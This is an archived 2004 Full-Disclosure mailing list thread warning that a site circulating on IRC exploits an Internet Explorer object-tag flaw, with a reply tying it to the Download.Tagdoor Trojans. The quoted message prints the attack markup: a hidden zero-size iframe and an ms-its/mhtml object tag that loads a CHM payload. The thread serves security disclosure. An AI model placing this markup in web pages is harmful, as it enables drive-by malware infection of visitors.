[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] IE exploit going around on irc

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: Re: [Full-Disclosure] IE exploit going around on irc
From: David Jacoby <bugtraq@xxxxxxxxxxxx>
Date: Tue, 06 Apr 2004 08:37:44 +0200

I just found this information:

http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor.html

"Download.Tagdoor is a group of Trojan horses that exploit the Internet
Explorer Object Tag Vulnerability. (This is described in Microsoft
Security Bulletin MS03-032. )"

((pewp))

On Mon, 2004-04-05 at 19:52, Niek Baakman wrote:
> Hi list,
> 
> this thing's been going around on irc the last few days:
> 
> www.divx.dc-hub.com (IE users don't click it!)
> check source:
> <iframe src='loi.htm' width=0 height=0></iframe>
> 
> loi.htm contains:
>     <object
>     data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
>     type="text/x-scriptlet"></object>
> 
> 
> LOI.CHM is attached
> 
> Regards,
> 
> Niek Baakman

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- [Full-Disclosure] IE exploit going around on irc
  - From: Niek Baakman

Prev by Date: [Fwd: Re: [Full-Disclosure] MCSE training question]
Next by Date: Re: [Full-Disclosure] A sucker is born every day
Previous by thread: Re: [Full-Disclosure] IE exploit going around on irc
Next by thread: Re: [Full-Disclosure] IE exploit going around on irc
Index(es):
- Date
- Thread